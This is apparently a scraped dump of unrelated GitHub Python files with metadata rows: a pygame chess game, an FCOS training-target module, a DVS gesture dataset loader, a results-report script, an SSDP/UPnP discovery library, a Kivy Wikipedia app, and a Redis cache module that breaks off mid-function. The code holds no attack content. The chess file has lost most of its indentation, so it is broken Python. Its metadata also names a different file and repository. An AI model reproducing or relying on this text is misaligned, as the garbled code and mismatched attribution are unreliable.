mpjuers/SexualSelectionSubstitutions
|
Scripts/GetData/windows.py
|
windows.py
|
py
| 1,594 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25068821679
|
import pygame
from math import *
import time
pygame.init()
pygame.display.set_caption("sprite sheet") # sets the window title
screen = pygame.display.set_mode((1000, 800)) # creates game screen
screen.fill((0,0,0))
clock = pygame.time.Clock() #set up clock
#Variables and stuff (Start)-------------------------------------------------------------------
red_pawn = pygame.image.load('RedPawn.png') #load your spritesheet
white_pawn = pygame.image.load('WhitePawn.png') #load your spritesheet
background = pygame.image.load('Chess board.png')#loads background
white_rook = pygame.image.load('WhiteRook.png')
red_rook = pygame.image.load('RedRook.png')
white_queen = pygame.image.load('WhiteQueen.png')
red_queen = pygame.image.load('RedQueen.png')
white_king = pygame.image.load('WhiteKing.png')
red_king = pygame.image.load('RedKing.png')
white_bishop = pygame.image.load('WhiteBishop.png')
red_bishop = pygame.image.load('RedBishop.png')
red_knight = pygame.image.load('RedKnight.png')
white_knight = pygame.image.load('WhiteKnight.png')
White=(255,255,255)
PIECEWIDTH = 100
checkmate = False #variable to run our game loop
whiteturn = True
hasPicked = False
clicked = False
TurnNum=0
ticks = 1
tickss = 1
t = 600
t2 = 600
pygame.display.set_caption('Show Text')
font = pygame.font.Font('freesansbold.ttf', 32)
#Variables and stuff (End)--------------------------------------------------------------------
#text to screen setup
#text input------------------------------------------
n1 = input('Enter your name player 1:')
n2 = input('Enter your name player 2')
#End of text input----------------------------------
#Pieces start-----------------------------------------------
class pieces:
def __init__(self,xpos,ypos,type):
self.xpos = xpos
self.ypos = ypos
self.lifted = False
self.type = type
self.alive = True
self.row=0
self.column=0
def updatePos(self):
self.row = int(self.xpos/100)
self.column = int(self.ypos/100)
print("my row and column is ", self.row, self.column)
self.xpos = self.row*100
self.ypos = self.column*100
def isClicked(self,x,y):
global hasPicked
global TurnNum
print("checking distance")
if self.alive == True:
if hasPicked == False and self.lifted == False:
if (sqrt(((self.xpos+50)-x)**2 + ((self.ypos+50)-y)**2)) <= 50:#check if the distance b/t (x, y) and (self.xpos, self.ypos) is LESS than 50
self.lifted = True #if true, set lifted to true
hasPicked = True
TurnNum+=1
print("lifted!")
else:
print("no collision")
def move(self, x, y):
if self.lifted == True:#if islifed is true, set self.xpos to x, and self.ypos to y
self.xpos = x-50
self.ypos = y-50
def draw(self):
if self.alive == True:
#pawns
if self.type == "WhitePawn":
screen.blit(white_pawn, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedPawn":
screen.blit(red_pawn, (self.xpos, self.ypos), (0, 0, 100, 100))
#knights
if self.type == "WhiteKnight":
screen.blit(white_knight, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedKnight":
screen.blit(red_knight, (self.xpos, self.ypos), (0, 0, 100, 100))
#bishop
if self.type == "WhiteBishop":
screen.blit(white_bishop, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedBishop":
screen.blit(red_bishop, (self.xpos, self.ypos), (0, 0, 100, 100))
#rook
if self.type == "WhiteRook":
screen.blit(white_rook, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedRook":
screen.blit(red_rook, (self.xpos, self.ypos), (0, 0, 100, 100))
#king
if self.type == "WhiteKing":
screen.blit(white_king, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedKing":
screen.blit(red_king, (self.xpos, self.ypos), (0, 0, 100, 100))
#queen
if self.type == "WhiteQueen":
screen.blit(white_queen, (self.xpos, self.ypos), (0, 0, 100, 100))
if self.type == "RedQueen":
screen.blit(red_queen, (self.xpos, self.ypos), (0, 0, 100, 100))
#Pieces End-----------------------------------------------------------
#python list (like a vector)
whitelist = []
redlist = []
#White Pawns
WhitePawn1 = pieces(0, 100, "WhitePawn")
whitelist.append(WhitePawn1)
WhitePawn2 = pieces(100, 100, "WhitePawn")
whitelist.append(WhitePawn2)
WhitePawn3 = pieces(200, 100, "WhitePawn")
whitelist.append(WhitePawn3)
WhitePawn4 = pieces(300, 100, "WhitePawn")
whitelist.append(WhitePawn4)
WhitePawn5 = pieces(400, 100, "WhitePawn")
whitelist.append(WhitePawn5)
WhitePawn6 = pieces(500, 100, "WhitePawn")
whitelist.append(WhitePawn6)
WhitePawn7 = pieces(600, 100, "WhitePawn")
whitelist.append(WhitePawn7)
WhitePawn8 = pieces(700, 100, "WhitePawn")
whitelist.append(WhitePawn8)
#Red Pawns
RedPawn1 = pieces(0, 600, "RedPawn")
redlist.append(RedPawn1)
RedPawn2 = pieces(100, 600, "RedPawn")
redlist.append(RedPawn2)
RedPawn3 = pieces(200, 600, "RedPawn")
redlist.append(RedPawn3)
RedPawn4 = pieces(300, 600, "RedPawn")
redlist.append(RedPawn4)
RedPawn5 = pieces(400, 600, "RedPawn")
redlist.append(RedPawn5)
RedPawn6 = pieces(500, 600, "RedPawn")
redlist.append(RedPawn6)
RedPawn7 = pieces(600, 600, "RedPawn")
redlist.append(RedPawn7)
RedPawn8 = pieces(700, 600, "RedPawn")
redlist.append(RedPawn8)
#White Rooks
WhiteRook1 = pieces(0, 0, "WhiteRook")
whitelist.append(WhiteRook1)
WhiteRook2 = pieces(700, 0, "WhiteRook")
whitelist.append(WhiteRook2)
#Red Rooks
RedRook1 = pieces(0, 700, "RedRook")
redlist.append(RedRook1)
RedRook2 = pieces(700, 700, "RedRook")
redlist.append(RedRook2)
#White Knights
WhiteKnight1 = pieces(100, 0, "WhiteKnight")
whitelist.append(WhiteKnight1)
WhiteKnight2 = pieces(600, 0, "WhiteKnight")
whitelist.append(WhiteKnight2)
#Red Knights
RedKnight1 = pieces(100, 700, "RedKnight")
redlist.append(RedKnight1)
RedKnight2 = pieces(600, 700, "RedKnight")
redlist.append(RedKnight2)
#White Bishops
WhiteBishop1 = pieces(200, 0, "WhiteBishop")
whitelist.append(WhiteBishop1)
WhiteBishop2 = pieces(500, 0, "WhiteBishop")
whitelist.append(WhiteBishop2)
#Red Bishop
RedBishop1 = pieces(200, 700, "RedBishop")
redlist.append(RedBishop1)
RedBishop2 = pieces(500, 700, "RedBishop")
redlist.append(RedBishop2)
#White and Red King
WhiteKing = pieces(300, 0, "WhiteKing")
whitelist.append(WhiteKing)
RedKing = pieces(300, 700, "RedKing")
redlist.append(RedKing)
#White and Red Queen
WhiteQueen = pieces(400, 0, "WhiteQueen")
whitelist.append(WhiteQueen)
RedQueen = pieces(400, 700, "RedQueen")
redlist.append(RedQueen)
#MAP:
map = [[3, 4, 5, 6, 7, 5, 4, 3],
[2, 2, 2, 2, 2, 2, 2, 2],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1],
[8, 9, 10, 11, 12, 10, 9, 8]]
while not checkmate:
clock.tick(60)
#print("clicked is ", clicked)
for event in pygame.event.get():
if event.type == pygame.QUIT:
checkmate = True
        if event.type == pygame.MOUSEBUTTONDOWN:
            print("click")
            if clicked == False:
                clicked = True
            elif clicked == True:
                clicked = False
if event.type == pygame.MOUSEBUTTONUP:
print("unclick")
clicked = False
if event.type == pygame.MOUSEMOTION: #check if mouse moved
mousePos = event.pos #refreshes mouse position
# print("mouse position: (",mousePos[0]," , ",mousePos[1], ")")
#COLLISION
#White updatepos
for i in range(len(whitelist)):
whitelist[i].updatePos()
#red updatepos
for i in range(len(redlist)):
redlist[i].updatePos()
if clicked ==True:
if whiteturn is True:# if whiteturn is true white pieces go
#white clicked function
for i in range(len(whitelist)):
whitelist[i].isClicked(mousePos[0],mousePos[1])
if whiteturn is False: # if whiteturn is false red goes
#red clicked function
for i in range(len(redlist)):
redlist[i].isClicked(mousePos[0],mousePos[1])
if clicked == False:
hasPicked = False
#white pieces lifted set down
for i in range(len(whitelist)):
whitelist[i].lifted = False
#red piece lifted set down
for i in range(len(redlist)):
redlist[i].lifted = False
#White pieces move
for i in range(len(whitelist)):
whitelist[i].move(mousePos[0],mousePos[1])
#Red pieces move
for i in range(len(redlist)):
redlist[i].move(mousePos[0],mousePos[1])
#print to screen
if whiteturn == True:
ticks +=1
if ticks%60==0: #add a ticker variable here, add 1 to it, when it hits 60, decrement t and reset time
t-=1
if t == 0:
gameover = True
if whiteturn == False:
tickss +=1
if tickss%60==0:
t2-=1
if t2 == 0:
gameover = True
text = font.render(str(t), True, (0,255,0))
textRect = text.get_rect()
textRect.center = (900, 0)
text2 = font.render(str(t2), True, (0,255,0))
textRect2 = text2.get_rect()
textRect2.center = (900, 800)
Name = font.render(str(n1), True, (255,255,255))
name = Name.get_rect()
name.center = (900, 100)
Name2 = font.render(str(n2), True, (255,255,255))
name2 = Name2.get_rect()
name2.center = (900, 700)
for i in range(len(whitelist)):
for j in range(len(redlist)):
if whiteturn == False:
if whitelist[i].row/100 == redlist[j].row/100 and whitelist[i].column/100 == redlist[j].column/100:
redlist[j].alive = False
print(redlist[j].type, "got killed")
if whiteturn == True:
if redlist[j].row/100 == whitelist[i].row/100 and redlist[j].column/100 == whitelist[i].column/100:
whitelist[i].alive = False
print(whitelist[i].type, "got killed")
if WhiteKing.alive == False:
checkmate = True
if RedKing.alive == False:
checkmate = True
# RENDER--------------------------------------------------------------------------------
screen.fill((0,0,0)) #wipe screen so it doesn't smear
screen.blit(background, (0,0))
if TurnNum % 2==0:
whiteturn=True
print("white's turn")
else:
print("red's turn")
whiteturn = False
print("Turn Num:", TurnNum)
#draws white pieces
for i in range(len(whitelist)):
whitelist[i].draw()
#draws red pieces
for i in range(len(redlist)):
redlist[i].draw()
screen.blit(Name, (900,50))
screen.blit(Name2, (900,700))
screen.blit(text, (900, 100))
screen.blit(text2, (900, 750))
pygame.display.flip()#this actually puts the pixel on the screen
#end game loop------------------------------------------------------------------------------
pygame.quit()
|
richfls/chess
|
main9.py
|
main9.py
|
py
| 11,852 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16438405840
|
# -*- coding: utf-8 -*-
"""
# @file name : target.py
# @author : chenzhanpeng https://github.com/chenzpstar
# @date : 2022-01-09
# @brief        : FCOS training target class
"""
import torch
import torch.nn as nn
from models.config import FCOSConfig
from models.utils import coords2centers, coords2offsets, decode_coords, reshape_feat
class FCOSTarget(nn.Module):
def __init__(self, cfg=None):
super(FCOSTarget, self).__init__()
if cfg is None:
self.cfg = FCOSConfig
else:
self.cfg = cfg
self.strides = self.cfg.strides
self.ranges = self.cfg.ranges
assert len(self.strides) == len(self.ranges)
def forward(self, feats, labels, boxes):
stages_num = len(self.strides)
assert len(feats) == stages_num
cls_targets = []
reg_targets = []
ctr_targets = []
for i in range(stages_num):
stage_targets = self._gen_stage_targets(
feats[i],
labels,
boxes,
self.strides[i],
self.ranges[i],
)
cls_targets.append(stage_targets[0])
reg_targets.append(stage_targets[1])
ctr_targets.append(stage_targets[2])
return cls_targets, reg_targets, ctr_targets
def _gen_stage_targets(self,
feat,
labels,
boxes,
stride,
range,
sample_radio=1.5):
coords = decode_coords(feat, stride).to(device=boxes.device)
feat = reshape_feat(feat) # bchw -> b(hw)c
batch_size, hw = feat.shape[:2] # b(hw)c
boxes_num = boxes.shape[1] # bnc
        # 1. compute the offsets from each location to the four sides of every gt box
offsets = coords2offsets(coords, boxes)
assert offsets.shape == (batch_size, hw, boxes_num, 4)
offsets_min = offsets.min(dim=-1)[0]
offsets_max = offsets.max(dim=-1)[0]
boxes_mask = offsets_min > 0
stage_mask = (offsets_max > range[0]) & (offsets_max <= range[1])
        # 2. compute the offsets from each location to the center of every gt box
ctr_offsets = coords2centers(coords, boxes)
assert ctr_offsets.shape == (batch_size, hw, boxes_num, 4)
radius = sample_radio * stride
ctr_offsets_max = ctr_offsets.max(dim=-1)[0]
ctr_mask = ctr_offsets_max <= radius
pos_mask = boxes_mask & stage_mask & ctr_mask
assert pos_mask.shape == (batch_size, hw, boxes_num)
        # 3. compute the area of every gt box
areas = (offsets[..., 0] + offsets[..., 2]) * (offsets[..., 1] +
offsets[..., 3])
areas[~pos_mask] = 999999 # neg_areas
areas_min_idx = areas.min(dim=-1)[1].unsqueeze(dim=-1)
areas_min_mask = torch.zeros_like(areas, dtype=torch.bool).scatter(
-1, areas_min_idx, 1)
assert areas_min_mask.shape == (batch_size, hw, boxes_num)
        # 4. build the classification targets
labels = torch.broadcast_tensors(
labels[:, None, :], areas.long())[0] # [b,1,n] -> [b,h*w,n]
cls_targets = labels[areas_min_mask].reshape((batch_size, -1, 1))
assert cls_targets.shape == (batch_size, hw, 1)
        # 5. build the regression targets
offsets = offsets / stride
reg_targets = offsets[areas_min_mask].reshape((batch_size, -1, 4))
assert reg_targets.shape == (batch_size, hw, 4)
        # 6. build the centerness targets
lr_min = torch.min(reg_targets[..., 0], reg_targets[..., 2])
lr_max = torch.max(reg_targets[..., 0], reg_targets[..., 2])
tb_min = torch.min(reg_targets[..., 1], reg_targets[..., 3])
tb_max = torch.max(reg_targets[..., 1], reg_targets[..., 3])
ctr_targets = ((lr_min * tb_min) /
(lr_max * tb_max).clamp(min=1e-10)).sqrt().unsqueeze(
dim=-1)
assert ctr_targets.shape == (batch_size, hw, 1)
        # 7. handle negative samples
pos_mask = pos_mask.long().sum(dim=-1)
pos_mask = pos_mask >= 1
assert pos_mask.shape == (batch_size, hw)
cls_targets[~pos_mask] = 0
reg_targets[~pos_mask] = -1
ctr_targets[~pos_mask] = -1
return cls_targets, reg_targets, ctr_targets
if __name__ == "__main__":
import torch
torch.manual_seed(0)
model = FCOSTarget()
preds = (
[torch.rand(2, 3, 2, 2)] * 5,
[torch.rand(2, 4, 2, 2)] * 5,
[torch.rand(2, 1, 2, 2)] * 5,
)
labels = torch.rand(2, 3)
boxes = torch.rand(2, 3, 4)
out = model(preds[0], labels, boxes)
[print(stage_out.shape) for branch_out in out for stage_out in branch_out]
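# With the 2x2 feature maps above (batch=2, so hw=4 locations per stage), the
# prints should show torch.Size([2, 4, 1]) for the 5 cls stages, [2, 4, 4] for
# the 5 reg stages and [2, 4, 1] for the 5 centerness stages.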
|
ydlam/Fcos-main
|
models/target.py
|
target.py
|
py
| 4,816 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32506946053
|
import fcntl
import logging
import socket
import struct
import urllib.request
from urllib.parse import urlparse
from xml.dom import minidom
from functools import wraps
import urllib.error
import xml
SIOCGIFINDEX = 0x8933 # Get interface index
logger = logging.getLogger(__name__)
class NotRetrievedError(Exception):
"""Custom exception for objects that have not been retrieved
Custom object not retrieved exception class. Raised whenever a certain
property for a device or service was not retrieved.
"""
pass
class NotAvailableError(Exception):
"""Custom exception for when a certain URL could not be retrieved
Custom element not retrieved exception class. Raised whenever a value
needed to be accessed could not be retrieved from the URL.
"""
pass
def parse_http_header(header, header_key):
"""Parse HTTP header value
Parse the value of a specific header from a RAW HTTP response.
:param header: String containing the RAW HTTP response and headers
:type header: str
:param header_key: The header name of which to extract a value from
:type header_key: str
:return: The value of the header
:rtype: str
"""
split_headers = header.split('\r\n')
for entry in split_headers:
header = entry.strip().split(':', 1)
if header[0].strip().lower() == header_key.strip().lower():
return ''.join(header[1::]).split()[0]
def make_http_request(url, data=None, headers=None):
"""Helper function for making HTTP requests
Helper function for making HTTP requests using urllib.
:param url: The URL to which a request should be made
:type url: str
:param data: Provide data for the request. Request method will be set to
POST if data is provided
:type data: str
:param headers: Provide headers to send with the request
:type headers: dict
:return: A urllib.Request.urlopen object
:rtype: urllib.Request.urlopen
"""
if not headers:
headers = {}
# If data is provided the request method will automatically be set to POST
# by urllib
request = urllib.request.Request(url, data=data, headers=headers)
return urllib.request.urlopen(request)
def _device_description_required(func):
"""Decorator for checking whether the device description is available on a
device.
"""
@wraps(func)
def wrapper(device, *args, **kwargs):
if device.description is None:
raise NotRetrievedError(
'No device description retrieved for this device.')
elif device.description == NotAvailableError:
return
return func(device, *args, **kwargs)
return wrapper
def _get_if_index(ifname, fd):
"""Get the index corresponding to interface ifname used by socket fd"""
ifreq = struct.pack('16si', ifname.encode(), 0)
res = fcntl.ioctl(fd, SIOCGIFINDEX, ifreq)
return int(struct.unpack('16si', res)[1])
class SSDPDevice:
"""Represents an SSDP device
Object for representing an SSDP device.
:param address: SSDP device address
:type address: tuple
:param response: Device discovery response data
:type response: str
"""
def __init__(self, address, response):
self.address = address
self.host = address[0]
self.port = address[1]
self.response = response
self.description = None
self.friendly_name = None
self.type_ = None
self.base_url = None
self._get_description_request(parse_http_header(response, 'Location'))
self._get_friendly_name_request()
self._get_type_request()
self._get_base_url_request()
def get_friendly_name(self):
"""Get the friendly name for the device
Gets the device's friendly name
:return: Friendly name of the device
:rtype: str
"""
return self.friendly_name
def _get_description_request(self, url):
try:
device_description = make_http_request(url).read()
self.description = device_description
return device_description.decode()
except (urllib.error.HTTPError, urllib.error.URLError):
self.description = NotAvailableError
return None
@_device_description_required
def _get_friendly_name_request(self):
root = minidom.parseString(self.description)
device_friendly_name = root.getElementsByTagName(
'friendlyName')[0].firstChild.nodeValue
self.friendly_name = device_friendly_name
return self.friendly_name
@_device_description_required
def _get_type_request(self):
root = minidom.parseString(self.description)
device_type = root.getElementsByTagName(
'deviceType')[0].firstChild.nodeValue
self.type_ = device_type
return self.type_
@_device_description_required
def _get_base_url_request(self):
location_header_value = parse_http_header(self.response, 'Location')
header_url = urlparse(location_header_value)
root = minidom.parseString(self.description)
try:
parsed_url = urlparse(
root.getElementsByTagName('URLBase')[0].firstChild.nodeValue)
if parsed_url.port is not None:
base_url = '{}://{}'.format(parsed_url.scheme,
parsed_url.netloc)
else:
base_url = '{}://{}:{}'.format(parsed_url.scheme,
parsed_url.netloc,
header_url.port)
except (IndexError, AttributeError):
base_url = '{}://{}'.format(header_url.scheme, header_url.netloc)
self.base_url = base_url
return base_url
class SSDPHeader:
def __init__(self, **headers):
"""
Example M-SEARCH header:
------------------------------------------------------------------------
M-SEARCH * HTTP/1.1 SSDP method for search requests
HOST: 239.255.255.250:1900 SSDP multicast address and port (REQUIRED)
MAN: "ssdp:discover" HTTP Extension Framework scope (REQUIRED)
MX: 2 Maximum wait time in seconds (REQUIRED)
ST: upnp:rootdevice Search target (REQUIRED)
------------------------------------------------------------------------
"""
self.headers = {}
self.set_headers(**headers)
self._available_methods = ['M-SEARCH']
self.method = None
self.host = self.headers.get('HOST')
self.man = self.headers.get('MAN')
self.mx = self.headers.get('MX')
self.st = self.headers.get('ST')
def _check_method_required_params(self):
if self.method == 'M-SEARCH':
# M-SEARCH required parameters: HOST, MAN, MX, ST
if None in [self.host, self.man, self.mx, self.st]:
raise ValueError(
'M-SEARCH method requires HOST, MAN, MX and ST headers '
'to be set.')
def set_method(self, method):
method = method.upper()
if method in self._available_methods:
self.method = method.upper()
else:
raise ValueError('Method must be either' +
' or '.join(self._available_methods))
def set_header(self, name, value):
self.headers[name.upper()] = value
def set_headers(self, **headers):
for key, value in headers.items():
self.set_header(key.upper(), value)
class SSDPRequest(SSDPHeader):
"""Create and perform an SSDP request
:param method: SSDP request method [M-SEARCH]
"""
def __init__(self,
ssdp_mcast_addr='239.255.255.250',
ssdp_port=1900,
src_port=None,
interface=None,
**headers):
super().__init__(**headers)
self.SSDP_MCAST_ADDR = ssdp_mcast_addr
self.SSDP_PORT = ssdp_port
self.set_header('HOST', "{}:{}".format(self.SSDP_MCAST_ADDR,
self.SSDP_PORT))
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if (src_port is not None):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(('', src_port))
if (interface is not None):
try:
ifindex = _get_if_index(interface, self.socket.fileno())
except OSError:
logger.error(
"Could not find interface \"{}\"".format(interface))
return
except ValueError:
logger.error(
"Failed to parse the index of interface \"{}\"".format(
interface))
return
ip_mreqn = struct.pack(
'4s4si',
socket.inet_aton(ssdp_mcast_addr),
socket.inet_aton('0.0.0.0'), # INADDR_ANY
ifindex)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF,
ip_mreqn)
def __del__(self):
self.socket.close()
def m_search(self, discover_delay=2, st='ssdp:all', **headers):
"""Perform an M-SEARCH SSDP request
Send an SSDP M-SEARCH request for finding UPnP devices on the network.
:param discover_delay: Device discovery delay in seconds
:type discover_delay: int
:param st: Specify device Search Target
:type st: str
:param headers: Specify M-SEARCH specific headers
:type headers: str
:return: List of device that replied
:rtype: list
"""
self.set_method('M-SEARCH')
self.set_header('MAN', '"ssdp:discover"')
self.set_header('MX', discover_delay)
self.set_header('ST', st)
self.set_headers(**headers)
self.socket.settimeout(discover_delay)
devices = self._send_request(self._get_raw_request())
for device in devices:
yield device
def _get_raw_request(self):
"""Get raw request data to send to server"""
final_request_data = ''
if self.method is not None:
ssdp_start_line = '{} * HTTP/1.1'.format(self.method)
else:
ssdp_start_line = 'HTTP/1.1 200 OK'
final_request_data += '{}\r\n'.format(ssdp_start_line)
for header, value in self.headers.items():
final_request_data += '{}: {}\r\n'.format(header, value)
final_request_data += '\r\n'
return final_request_data
def _send_request(self, message):
self.socket.sendto(message.encode(),
(self.SSDP_MCAST_ADDR, self.SSDP_PORT))
devices = []
try:
while True:
# UDP packet data limit is 65507 imposed by IPv4
# https://en.wikipedia.org/wiki/User_Datagram_Protocol#Packet_structure
response, addr = self.socket.recvfrom(65507)
try:
device = SSDPDevice(addr, response.decode())
except xml.parsers.expat.ExpatError:
continue
devices.append(device)
except socket.timeout:
pass
return devices
class UPnP:
"""UPnP object
A UPnP object used for device discovery
"""
def __init__(self, src_port=None, interface=None):
self.ssdp = SSDPRequest(src_port=src_port, interface=interface)
self.discovered_devices = []
def discover(self, delay=2, **headers):
"""Find UPnP devices on the network
Find available UPnP devices on the network by sending an M-SEARCH
request.
:param delay: Discovery delay, amount of time in seconds to wait for a
reply from devices
:type delay: int
:param headers: Optional headers for the request
:return: List of discovered devices
:rtype: list
"""
discovered_devices = []
for device in self.ssdp.m_search(discover_delay=delay,
st='upnp:rootdevice',
**headers):
discovered_devices.append(device)
self.discovered_devices = discovered_devices
return self.discovered_devices
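# Usage sketch (assumption: a LAN with UPnP devices is reachable; discovery
# sends real SSDP multicast traffic, so it is kept behind a __main__ guard):
if __name__ == '__main__':
    upnp = UPnP()
    for device in upnp.discover(delay=2):
        print(device.get_friendly_name(), device.base_url)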
|
Blockstream/satellite
|
blocksatcli/upnp.py
|
upnp.py
|
py
| 12,542 |
python
|
en
|
code
| 949 |
github-code
|
6
|
71578007227
|
import h5py
import os
from torch.utils.data import Dataset
from DVS_dataload.my_transforms import *
from PIL import Image
import torch
import numpy as np
class DVSGestureDataset(Dataset):
def __init__(self, root, train=True, transform=None):
super(DVSGestureDataset, self).__init__()
self.n = 0
self.root = root
self.train = train
self.transform = transform
if train:
root_train = os.path.join(self.root, 'DvsGesture_train_40step_downsample')
for _, _, self.files_train in os.walk(root_train):
pass
self.n = len(self.files_train)
else:
root_test = os.path.join(self.root, 'DvsGesture_test_40step_downsample')
for _, _, self.files_test in os.walk(root_test):
pass
self.n = len(self.files_test)
def __len__(self):
return self.n
def __getitem__(self, idx):
if self.train:
            root_train = os.path.join(self.root, 'DvsGesture_train_40step_downsample')
            with h5py.File(root_train + os.sep + self.files_train[idx], 'r', swmr=True, libver="latest") as f:
target = f['label'][()]
data = f['data'][()]
if self.transform is not None:
data = self.transform(data)
return data, target
else:
root_test = os.path.join(self.root, 'DvsGesture_test_40step_downsample')
with h5py.File(root_test + os.sep + self.files_test[idx], 'r', swmr=True, libver="latest") as f:
target = f['label'][()]
data = f['data'][()]
if self.transform is not None:
data = self.transform(data)
return data, target
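# Usage sketch (the dataset root below is illustrative; it must contain the
# 'DvsGesture_train_40step_downsample' / '..._test_...' folders of HDF5 files):
if __name__ == '__main__':
    from torch.utils.data import DataLoader
    train_set = DVSGestureDataset(root='./data/DVS_Gesture', train=True)
    loader = DataLoader(train_set, batch_size=16, shuffle=True)
    data, target = next(iter(loader))
    print(data.shape, target)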
|
langfengQ/MLF-DSResNet
|
DVS_dataload/DVS_Gesture_dataset.py
|
DVS_Gesture_dataset.py
|
py
| 1,762 |
python
|
en
|
code
| 8 |
github-code
|
6
|
11726066534
|
# creates the finale report
import sys
import os
import glob
CL_HOME = os.environ['CL_HOME']
obj_folder = CL_HOME + "/testFinale"
las_f = obj_folder + "/finale_las.tsv"
mlas_f = obj_folder + "/finale_mlas.tsv"
blex_f = obj_folder + "/finale_blex.tsv"
ltcode2results = {}
for out_file in glob.glob(obj_folder+"/out_*"):
fname = out_file.split("/")[-1]
ltcode = fname[fname.find('_')+1:fname.rfind('_')]
las_score, mlas_score, blex_score = None, None, None
with open(out_file, 'r') as f:
for line in f:
line = line.strip()
if line.startswith("LAS F1"):
las_score = line
if line.startswith("MLAS"):
mlas_score = line
if line.startswith("BLEX"):
blex_score = line
if las_score and mlas_score and blex_score:
if ltcode not in ltcode2results:
ltcode2results[ltcode] = {}
if fname.endswith('udtags'):
ltcode2results[ltcode]['udpipe'] = {}
for name, score in [('las', las_score), ('mlas', mlas_score), ('blex', blex_score)]:
ltcode2results[ltcode]['udpipe'][name] = score.split()[3] if name == 'las' else score.split()[2]
ltcode2results[ltcode]['elmolex-udtags'] = {}
for name, score in [('las', las_score), ('mlas', mlas_score), ('blex', blex_score)]:
ltcode2results[ltcode]['elmolex-udtags'][name] = score.split()[5] if name == 'las' else score.split()[4]
if fname.endswith('bentags'):
ltcode2results[ltcode]['elmolex-bentags'] = {}
for name, score in [('las', las_score), ('mlas', mlas_score), ('blex', blex_score)]:
ltcode2results[ltcode]['elmolex-bentags'][name] = score.split()[5] if name == 'las' else score.split()[4]
def get_map(mp, fst, scnd):
if fst in mp:
if scnd in mp[fst]:
return mp[fst][scnd]
return 'None'
las_w = open(las_f, 'w')
mlas_w = open(mlas_f, 'w')
blex_w = open(blex_f, 'w')
header = 'tb\tudpipe\telmolex-udtags\telmolex-bentags\n'
las_w.write(header)
mlas_w.write(header)
blex_w.write(header)
for ltcode in sorted(ltcode2results):
for name, w in [('las', las_w), ('mlas', mlas_w), ('blex', blex_w)]:
udpipe = get_map(ltcode2results[ltcode], 'udpipe', name)
udtags = get_map(ltcode2results[ltcode], 'elmolex-udtags', name)
bentags = get_map(ltcode2results[ltcode], 'elmolex-bentags', name)
w.write(ltcode+"\t"+udpipe+"\t"+udtags+"\t"+bentags+"\n")
las_w.close()
mlas_w.close()
blex_w.close()
print('las, mlas and blex results respectively can be fetched from the following files:')
print(las_f)
print(mlas_f)
print(blex_f)
|
ganeshjawahar/ELMoLex
|
conll18/py/createFinaleReport.py
|
createFinaleReport.py
|
py
| 2,523 |
python
|
en
|
code
| 12 |
github-code
|
6
|
32552302191
|
import threading
import wikipedia
from kivy.clock import mainthread
from kivymd.app import MDApp
class MainApp(MDApp):
url = ""
def build(self):
self.title = "Wikipedia-App"
@mainthread
def search(self, text):
t1 = threading.Thread(target=self.get_wiki, args=(text,), daemon=True)
t1.start()
def get_wiki(self, text):
self.root.ids.rc_spin.active = True
self.root.ids.summary.text = ""
self.root.ids.title.text = ""
wikipedia.set_lang("en")
try:
summary = wikipedia.page(text.strip())
self.root.ids.title.text = summary.title
self.root.ids.summary.text = f"\n{summary.summary}"
except Exception as e:
print(e)
self.root.ids.title.text = (
"[color=#EE4B2B]"
+ "Sorry unable to find "
+ self.root.ids.fld.text
+ "[/color]"
)
self.root.ids.rc_spin.active = False
if __name__ == "__main__":
MainApp().run()
|
Kulothungan16/Example-Kivy-Apps
|
WikiPedia/main.py
|
main.py
|
py
| 1,052 |
python
|
en
|
code
| 42 |
github-code
|
6
|
28382691901
|
from .api import genshindb as gdb
def calc_talent_cost(name, current_level, to_level):
"""
Calculate talent cost.
:param name: character name
:param current_level: current level
:param to_level: to level
:return: talent cost dict
"""
if current_level >= to_level:
return None
json_data = gdb.get_tdata_by_cname(name)["costs"]
talent_cost = {}
for level in range(current_level + 1, to_level + 1):
for cost in json_data[f"lvl{level}"]:
name = cost["name"]
count = cost["count"]
if name not in talent_cost:
talent_cost[name] = 0
talent_cost[name] += count
return talent_cost
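# Usage sketch (character name and levels are illustrative; calc_talent_cost
# needs the genshindb API wrapper imported above to be reachable):
if __name__ == '__main__':
    print(calc_talent_cost("Hu Tao", 1, 10))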
|
waigoma/genshin-charatraining-supporter
|
src/cgi-bin/genshin/talent_calculator.py
|
talent_calculator.py
|
py
| 704 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70075665148
|
#!/usr/bin/env python3
"""
Cache class. In the __init__ method, store an instance of the Redis
client as a private variable named _redis (using redis.Redis()) and
flush the instance using flushdb.
"""
import redis
from typing import Union, Optional, Callable
from uuid import uuid4
from functools import wraps
def count_calls(method: Callable) -> Callable:
"""
count how many times the function was called
"""
key = method.__qualname__
@wraps(method)
def wrapper(self, *args, **kwargs):
""" Wrapper for decorator functionality """
self._redis.incr(key)
return method(self, *args, **kwargs)
return wrapper
def call_history(method: Callable) -> Callable:
"""
store the history of inputs and outputs for a particular function.
"""
inputs = '{}:inputs'.format(method.__qualname__)
outputs = '{}:outputs'.format(method.__qualname__)
@wraps(method)
def wrapper(self, *args, **kwds):
"""wrapper function"""
self._redis.rpush(inputs, str(args))
output = method(self, *args, **kwds)
self._redis.rpush(outputs, output)
return output
return wrapper
def replay(methodName: Callable) -> None:
"""
Display the history of calls of a function
"""
_redis = redis.Redis()
try:
calls = _redis.get(methodName.__qualname__).decode('utf-8')
except Exception:
calls = 0
print(f'{methodName.__qualname__} was called {calls} times:')
inputs = _redis.lrange(methodName.__qualname__ + ':inputs', 0, -1)
outputs = _redis.lrange(methodName.__qualname__ + ':outputs', 0, -1)
for input, output in zip(inputs, outputs):
